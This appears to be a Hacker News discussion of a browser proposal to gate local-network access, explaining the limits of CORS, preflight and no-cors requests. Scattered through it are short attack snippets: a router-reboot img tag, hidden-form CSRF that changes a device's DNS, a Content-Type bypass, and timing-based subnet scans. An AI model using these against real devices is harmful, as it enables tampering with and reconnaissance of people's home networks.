This is a misunderstanding. Local network devices are protected from random websites by CORS, and have been for many years. It's not perfect, but it's generally quite effective.
The issue is that CORS gates access only on the consent of the target server. It must return headers that opt into receiving requests from the website.
This proposal aims to tighten that, so that even if the website and the network device both actively want to communicate, the user's permission is also explicitly requested. Historically we assumed server & website agreement was sufficient, but Facebook's recent tricks where websites secretly talked to apps on your phone have broken that assumption - websites might be in cahoots with local network servers to work against your interests.
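To make the "consent of the target server" point concrete, here is a minimal sketch (the device URL and the attacker origin are hypothetical): the request reaches the device either way; only the device's response headers decide whether the page gets to read the reply.

    // Hedged sketch; the device IP is illustrative.
    try {
      const resp = await fetch("http://192.168.1.20/status");
      // We only get here if the device opted in with a header like
      //   Access-Control-Allow-Origin: https://evil.example   (or *)
      console.log(await resp.text());
    } catch {
      // No opt-in header: the promise rejects and the page learns nothing,
      // but the GET itself still reached the device.
    }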
Doesn't CORS just restrict whether the webpage JS context gets to see the response of the target request? The request itself happens anyway, right?
So the attack vector I can imagine is that JS in the browser can issue a specially crafted request to a vulnerable printer or whatever that triggers arbitrary code execution on that other device. That code might be sufficient to cause the printer to carry out your evil task, including making an outbound connection to the attacker's server. Of course, the webpage would not be able to discover whether it was successful, but that may not be important.
I think CORS is so hard for us to hold in our heads in large part due to how much is stuffed into the algorithm.
It may send an OPTIONS request, or not.
It may block a request being sent (in response to OPTIONS) or block a response from being read.
It may restrict which headers can be set, or read.
It may silently downgrade the request you were sending, or consider your request valid but the response off limits.
It is a matrix of independent gates essentially.
Even the language we use is imprecise: CORS itself is not really doing any of this or blocking things. As others pointed out, it's the Same-Origin Policy that is the strict one, and CORS is really an exception engine that lets us punch through that security layer.
No, a preflight (OPTIONS) request is sent by the browser before the request initiated by the application. I would be surprised if the page could control this OPTIONS request beyond just the URL. I am curious if anyone else has any input on this topic though.
Maybe there is some side-channel timing that can be used to determine the existence of a device, but not so sure about actually crafting and delivering a malicious payload.
This tag:
<img src="http://192.168.1.1/router?reboot=1">
triggers a local-network GET request without any CORS involvement. I remember back in the day you could embed <img src="http://someothersite.com/forum/ucp.php?mode=logout"> in your forum signature and screw with everyone's sessions across the web.
Haha I remember that. The solution at the time for many forum admins was to simply state that anyone found to be doing that would be permabanned. Which was enough to make it stop completely, at least for the forums that I moderated. Different times indeed.
<img src="C:\con\con"></img>
It's essentially the same, as many apps use an HTTP server + HTML client instead of something native or another IPC mechanism.
Exactly, you can also trigger forms for POST or DELETE etc. This is called CSRF if the endpoint doesn't validate some token in the request. CORS only protects against unauthorized XHR requests. All decades-old OWASP basics, really.
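A sketch of the form-based CSRF being described, with a made-up local device endpoint and field names (the hidden iframe just keeps the attack page from visibly navigating):

    // Hedged sketch; device URL and parameters are illustrative.
    const frame = document.createElement("iframe");
    frame.style.display = "none";
    frame.name = "sink";
    document.body.appendChild(frame);

    const form = document.createElement("form");
    form.method = "POST";
    form.action = "http://192.168.1.1/settings";   // hypothetical local device
    form.target = "sink";                          // response lands in the hidden frame
    const dns = document.createElement("input");
    dns.type = "hidden";
    dns.name = "dns";
    dns.value = "203.0.113.50";                    // attacker-controlled value
    form.appendChild(dns);
    document.body.appendChild(form);
    form.submit();  // urlencoded POST: no preflight, no CORS check, reply unreadable to the page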
That highly ranked comments on HN (an audience with way above-average engineering interest in software and security) get this wrong kinda explains why these things keep being an issue.
I'm betting HN is vastly more normal people and manager types than people want to admit.
None of us had to pass a security test to post here. There's no filter. That makes it pretty likely that HN's community is exactly as shitty as the rest of the internet's.
People need to stop treating this community like some club of enlightened elites. It's hilariously sad and self-congratulatory.
I don't know why you are getting downvoted, you do have a point. Some of the comments appear to know what CORS headers are, but not their purpose nor how they relate to CSRF, it seems, which is worrying. It's not meant as disparaging. My university taught a course on OWASP, thankfully; otherwise I'd probably also be oblivious.
If you're going cross-domain with XHR, I'd hope you're mostly sending json request bodies and not forms.
Though to be fair, a lot of web frameworks have methods to bind named inputs that allow either.
This misses the point a bit. CSRF usually applies to people who want only same-domain requests and don't realize that cross-domain is an option for the attacker.
In the modern web it's much less of an issue due to SameSite cookies being the default.
> Exactly you can also trigger forms for POST or DELETE etc
You can't do a DELETE from a form; you have to use AJAX. And a cross-origin DELETE needs a preflight.
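For comparison, a minimal sketch of what a page-initiated DELETE looks like (the URL is illustrative): DELETE is not a CORS-safelisted method, so the browser preflights it and drops it unless the target opts in.

    // Hedged sketch; URL is illustrative.
    // The browser first sends OPTIONS /jobs/42 with Access-Control-Request-Method: DELETE.
    // Unless the device replies with Access-Control-Allow-Methods: DELETE (and a matching
    // Allow-Origin), the DELETE itself is never sent.
    await fetch("http://192.168.1.20/jobs/42", { method: "DELETE" });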
To nitpick, CSRF is not the ability to use forms per se, but relying solely on the existence of a cookie to authorize actions with side effects.
The expectation is that this should not work - well-behaved network devices shouldn't accept a blind GET like this for destructive operations. There are plenty of other good reasons for that. There's no real alternative unless you're also going to block page redirects & links to these URLs as well, which trigger a similar GET. That would make it impossible to access any local network page without typing it manually.
While it clearly isn't a hard guarantee, in practice it does seem to generally work, as these have been known issues without apparent massive exploits for decades. That CORS restrictions block probing (no response provided) does help make this all significantly more difficult.
"No true Scotsman allows GETs with side effects" is not a strong argument
It's not just HTTP where this is a problem. There are enough HTTP-ish protocols where protocol-smuggling confusion is a risk. It's possible to send chimeric HTTP requests at devices which then interpret them as a protocol other than HTTP.
Yes, which is why web browsers way back, even in the Netscape Navigator era, had a blacklist of disallowed ports.
The idea is, the malicious actor would use a 'simple request' that doesn't need a preflight (basically, a GET or POST request with form data or plain text), and manage to construct a payload that exploits the target device. But I have yet to see a realistic example of such a payload (the paper I read about the idea only vaguely pointed at the existence of polyglot payloads).
There doesn't need to be any kind of "polyglot payload". Local network services and devices that accept only simple HTTP requests are extremely common. The request will go through and alter state, etc.; you just won't be able to read the response from the browser.
Exactly. People who are answering must not have been aware of “simple” requests not requiring preflight.
I can give an example of this; I found such a vulnerability a few years ago now in an application I use regularly.
The target application in this case was trying to validate incoming POST requests by checking that the incoming MIME type was "application/json". Normally, you can't make unauthorized XHR requests with this MIME type, as the browser will send a preflight.
However, because of the way it was checking for this (checking whether the Content-Type header contained the text "application/json"), it was relatively easy to construct a new Content-Type header that bypasses CORS:
Content-Type: multipart/form-data; boundary=application/json
It's worth bearing in mind in this case that the payload doesn't actually have to be form data - the application was expecting JSON, after all! As long as the web server doesn't do its own data validation (which it didn't in this case), we can just pass JSON as normal.
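A sketch of how such a request could look from the attacker's page (the endpoint and payload are hypothetical): the parsed essence of the Content-Type is still multipart/form-data, which is CORS-safelisted, so this stays a "simple" request and no preflight is sent.

    // Hedged sketch; endpoint and body are illustrative.
    fetch("http://victim.local/api/execute", {
      method: "POST",
      mode: "no-cors",
      headers: {
        // Parsed MIME type is multipart/form-data (safelisted), yet a naive
        // contains("application/json") check on the server still matches.
        "Content-Type": "multipart/form-data; boundary=application/json",
      },
      body: JSON.stringify({ cmd: "do-something" }),
    });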
This was particularly bad because the application allowed arbitrary code execution via this endpoint! It was fixed, but in my opinion, something like that should never have been exposed to the network in the first place.
Oh, you can only send arbitrary text or form submissions. That’s SO MUCH.
You don't even need to be exploiting the target device, you might just be leaking data over that connection.
Yeah, I think this is the reason this proposal is getting more traction again.
Here's a formal definition of such simple requests, which may be more expansive than one might expect: https://developer.mozilla.org/en-US/docs/Web/HTTP/Guides/COR...
Some devices don't bother to limit the size of the GET, which can enable a DoS attack at least, a buffer overflow at worst. But I think the most typical vector is a form-data POST, which isn't CSRF-protected because "it's on localhost so it's safe, right?"
I've been that sloppy with dev servers too. Usually not listening on port 80 but that's hardly Ft Knox.
I think that is because it is so old that it's basically old news and mostly mitigated.
https://www.kb.cert.org/vuls/id/476267 is an article from 2001 on it.
It can send a JSON-RPC request to your Bitcoin node and empty your wallet.
Do you know of any such node that doesn't check the Content-Type of requests and also has no authentication?
Bitcoin Core if you disable authentication
There's no such thing, short of forking it yourself. You can set the username and password to admin:admin if you want, but Bitcoin Core's JSON-RPC server requires an Authorization header on every request [0], and you can't put an Authorization header on a cross-origin request without a preflight.
[0] https://github.com/bitcoin/bitcoin/blob/v29.0/src/httprpc.cp...
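To illustrate why that matters (port and credentials below are just the usual defaults, purely for illustration): because Authorization is not a CORS-safelisted request header, a web page attempting this is stopped at the preflight.

    // Hedged sketch; Bitcoin Core's default RPC port is 8332, credentials are made up.
    fetch("http://127.0.0.1:8332/", {
      method: "POST",
      headers: {
        "Authorization": "Basic " + btoa("admin:admin"),  // non-safelisted: forces an OPTIONS preflight
        "Content-Type": "text/plain",
      },
      body: JSON.stringify({ method: "getbalance", params: [] }),
    });
    // Unless the node explicitly opts in to CORS on the preflight, the POST is never sent.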
Good to know. I remember you used to be able to disable it via config, but it looks like I was wrong.
You’re forgetting { mode: 'no-cors' }, which makes the response opaque (no way to read the data) but completely bypasses the CORS preflight request and header checks.
This is missing important context. You are correct that preflight will be skipped, but there are further restrictions when operating in this mode. They don't guarantee your server is safe, but it does force operation under a “safer” subset of verbs and header fields.
The browser will restrict the headers and methods of requests that can be sent in no-cors mode (silent censoring in the case of headers, more specifically).
Anything besides GET, HEAD, or POST will result in an error in the browser and not be sent.
All headers will be dropped besides the CORS-safelisted headers [0]
And Content-Type must be one of urlencoded, form-data, or text/plain. Attempting to use anything else will see the header replaced by text/plain.
[0] https://developer.mozilla.org/en-US/docs/Glossary/CORS-safel...
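A sketch of those restrictions in action, against a hypothetical local endpoint:

    // Hedged sketch; the IP and payload are illustrative.
    const resp = await fetch("http://192.168.0.10/api", {
      method: "POST",
      mode: "no-cors",
      headers: {
        "Content-Type": "application/json",  // not safelisted: effectively goes out as text/plain
        "X-Api-Key": "secret",               // silently dropped
      },
      body: JSON.stringify({ action: "reboot" }),
    });
    console.log(resp.type, resp.status);     // "opaque", 0 - nothing about the reply is readable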
That’s just not that big of a restriction. Anecdotally, very few JSON APIs I’ve worked with have bothered to check the request Content-Type. (“Minimal” web frameworks without built-in security middleware have been very harmful in this respect.) People don’t know about this attack vector and don’t design their backends to prevent it.
I agree that it is not a robust safety net. But in the instance you're citing, that's a misconfigured server.
What framework allows you to set up a misconfigured parser out of the box?
I don't mean that as a challenge, but as a server framework maintainer I'm genuinely curious. In Express we would definitely allow people to opt into this, but you have to explicitly make the choice to go and configure body-parser.json to accept all content types via a noop function for type checking.
Meaning, it's hard to get into this state!
Edit to add: there are myriad ways to misconfigure a webserver to make it insecure without realizing. But IMO that is the point of using a server framework! To make it less likely devs will footgun, via sane defaults that prevent these scenarios unless someone really wants to make a different choice.
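A sketch of the Express configuration being described (the route is made up); the default only parses application/json bodies, and the commented-out line is the explicit opt-in footgun.

    // Hedged sketch; route and handler are illustrative.
    import express from "express";

    const app = express();

    // Default: express.json() only parses bodies whose Content-Type is application/json,
    // so a preflight-free cross-site request sent as text/plain or form-data stays unparsed.
    app.use(express.json());

    // The explicit footgun described above: accept any Content-Type via a noop type check.
    // app.use(express.json({ type: () => true }));

    app.post("/api/action", (req, res) => {
      res.json({ received: req.body });
    });

    app.listen(3000);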
SvelteKit for sure, and any other JS framework that uses the built-in Request class (which doesn’t check the Content-Type when you call json()).
I don’t know the exact frameworks, but I consume a lot of random undocumented backend APIs (web scraper work) and 95% of the time they’re fine with JSON requests with Content-Type: text/plain.
I think you’re making those restrictions out to be bigger than they are.
Does no-cors allow a nefarious company to send a POST request to a local server, running in an app, containing whatever arbitrary data they’d like? Yes, it does. When you control the server side the inability to set custom headers etc doesn’t really matter.
My intent isn't to convince people this is a safe mode, but to share knowledge in the hope someone learns something new today.
I didn't mean it to come across that way. The spec does what the spec does; we should all be aware of it so we can make informed decisions.
Thankfully no-cors also restricts most headers, including setting Content-Type to anything but the built-in form types. So while CSRF doesn't even need a click because of no-cors, it's still not possible to do CSRF with a JSON-only API. Just be sure the server is actually set up to restrict the content type -- most frameworks will "helpfully" accept and convert form-data by default.
> No, a preflight (OPTIONS) request is sent by the browser first prior to sending the request initiated by the application.
Note: preflight is not required for any type of request that browser JS was capable of making prior to CORS being introduced. (Except for the local network.)
So a simple GET or POST does not require OPTIONS, but if you set a header it might require OPTIONS (unless it's a header you could set in the pre-CORS world).
It depends. GET requests are assumed not to have side effects, so they often don't have a preflight request (although there are cases where they do). But of course, not all sites follow those semantics, and it wouldn't surprise me if printer or router firmware used GETs to do something dangerous.
Also, form submission famously doesn't require CORS.
There is a limited, but potentially effective, attack surface via URL parameters.
I can confirm that local websites that don't implement CORS via the OPTIONS request cannot be browsed with mainstream browsers. Does nothing to prevent non-browser applications running on the local network from accessing your website.
As far as I can tell, the only thing this proposal does that CORS does not already do is provide some level of enterprise configuration control to guard against the scenario where your users are using compromised internet sites that can ping around your internal network for agents running on compromised desktops. Maybe? I don't get it.
If somebody would fix the "no HTTPS for local connections" issue, then IoT websites could use authenticated logins to fix both problems. Non-HTTPS websites also have no access to browser crypto APIs, so roll-your-own auth (the horror) isn't an option either. Frustrating!
I don't believe this is true? As others have pointed out, preflight OPTIONS requests only happen for non-simple requests. CORS response headers are still required to read a cross-domain response, but that still leaves a huge window for a malicious site to send side-effectful requests to your local network devices that have some badly implemented web server running.
[edit]: I was wrong. Just tested that a moment ago. It turns out NOT to be true. My web server during normal operation is currently NOT getting OPTIONS requests at all.
Wondering whether I triggered CORS requests when I was struggling with IPv6 problems. Or maybe it triggers when I redirect index.html requests from IPv6 to IPv4 addresses. Or maybe I got caught by the earlier rollout of version one of this proposal? There was definitely a time while I was developing pipedal when none of my images displayed because my web server wasn't doing CORS. But whatever my excuse might be, I was wrong. :-/
Or simply perform a timing attack as a way of exploring the local network, though I'm not sure if the browser implementation immediately returns after the request is made (e.g. when the fetch API is called) but before the response is received. Presumably it doesn't, which would expose it to timing attacks as a way of exploring the network.
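A sketch of the kind of timing probe being described, under the assumption that quick failures and slow timeouts are distinguishable (the threshold and IPs are made up; real probes would calibrate):

    // Hedged sketch; the 1000ms cutoff is a guess.
    async function probe(ip: string): Promise<boolean> {
      const start = performance.now();
      try {
        await fetch(`http://${ip}/`, { mode: "no-cors" });
        return true;                          // opaque response: something answered
      } catch {
        // A fast rejection (connection refused) still hints a host exists;
        // a slow one usually means the address just timed out.
        return performance.now() - start < 1000;
      }
    }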
eBay, for one, has been (was?) fingerprinting users like this for years.
https://security.stackexchange.com/questions/232345/ebay-web...
Almost every JS API for making requests is asynchronous, so they do return after the request is made. The exception is synchronous XHR calls, but I'm not sure if those are still supported.
... Anyhow, I think it doesn't matter because you can listen for the error/failure of most async requests. CORS errors are equivalent to network errors - the browser tells the JS it got status code 0 with no further information - but the timing of that could lead to some sort of inference? Hard to say what that would be though. Maybe if you knew the target webserver was slow but would respond to certain requests, a slower failed local request could mean it actually reached a target device.
That said, why not just fire off simple HTTP requests with your intended payload? Abusing the CSRF vulnerabilities of local network devices seems far easier than trying to make something out of a timing attack here.
This is also a misunderstanding. CORS only applies to the Layer 7 communication. The rest you can figure out from the timing of that.
Significant components of the browser, such as WebSockets, have no such restrictions at all.
Won't the browser still append the "Origin" field to WebSocket requests, allowing servers to reject them?
Yes, and that's exactly how Discord's WebSocket communication checks work (allowing them to offer a non-scheme "open in app" from the website).
They also had some kind of RPC WebSocket system for game developers, but that appears to have been abandoned: https://discord.com/developers/docs/topics/rpc
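A sketch of that kind of server-side Origin check, using the Node "ws" package (the allowed origin is illustrative):

    // Hedged sketch; the trusted origin is made up.
    import { WebSocketServer } from "ws";

    const wss = new WebSocketServer({ port: 8080 });

    wss.on("connection", (socket, req) => {
      // Browsers attach the page's Origin to the WebSocket handshake, so a local
      // service can refuse connections coming from unknown websites.
      if (req.headers.origin !== "https://trusted.example") {
        socket.close(1008, "origin not allowed");   // 1008 = policy violation
        return;
      }
      socket.send("hello");
    });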
A WebSocket starts as a normal HTTP request, so it is subject to CORS if the initial request was (e.g. if it was a POST).
CORS doesn't protect you from anything. Quite the opposite: it _allows_ cross-origin communication (provided you follow the spec). The same-origin policy is what protects you.
I made a CTF challenge 3 years ago that proves why local devices are not so protected. exploitv99 bypasses PNA with timing, as the other commenter points out.
https://github.com/adc/ctf-midnightsun2022quals-writeups/tre...
CORS prevents the site from accessing the response body. In some scenarios, a website could, for example, blindly attempt to authenticate to your router and modify settings by guessing your router brand/model and password.
> The issue is that CORS gates access only on the consent of the target server. It must return headers that opt into receiving requests from the website.
False. CORS only gates non-simple requests (via OPTIONS); simple requests are sent regardless of CORS config, so there is no gating whatsoever.
How would Facebook do that? They scan all likely local ranges for what could be your phone, and have a web server running on the phone? That seems more like a problem of allowing the phone app to start something like that and keep it running in the background.
WebRTC allows you to find the local ranges.
Typically there are only 256 IPs, so a scan of them all is almost instant.
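A sketch of such a sweep, reusing the probe idea from earlier in the thread (the subnet and timeout are assumptions; in practice the range would come from the WebRTC leak just mentioned):

    // Hedged sketch; subnet and 500ms timeout are illustrative.
    const subnet = "192.168.1";
    const live: string[] = [];
    await Promise.all(
      Array.from({ length: 254 }, (_, i) => `${subnet}.${i + 1}`).map(async (ip) => {
        try {
          await fetch(`http://${ip}/`, { mode: "no-cors", signal: AbortSignal.timeout(500) });
          live.push(ip);   // an opaque response came back, so something is listening
        } catch {
          // refused, aborted, or unreachable
        }
      }),
    );
    console.log(live);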
Do you have a link talking about those recent Facebook tricks? I think I missed that story and would love to read an analysis about it.
I think this can be circumvented by DNS rebinding, though your requests won't have the authentication cookies for the target, so you would still need some kind of exploit (or a completely unprotected target).
How? The browser would still have to resolve it to a final IP, right?
I'm not sure what you mean but this explains it: https://github.blog/security/application-security/localhost-...
Is this kind of attack actually in scope for this proposal? The explainer doesn't mention it.
> Local network devices are protected from random websites by CORS
C'mon. We all know that 99% of the time, Access-Control-Allow-Origin is set to * and not to the specific IP of the web service.
Also, CORS is not in the control of the user while the proposal is. And that's a huge difference.
> but Facebook's recent tricks where websites secretly talked to apps on your phone have broken that assumption - websites might be in cahoots with local network servers to work against your interests.
This isn't going to help for that. The locally installed app, and the website, can both, independently, open a connection to a 3rd party. There's probably enough fingerprinting available for the 3rd party to be able to match them.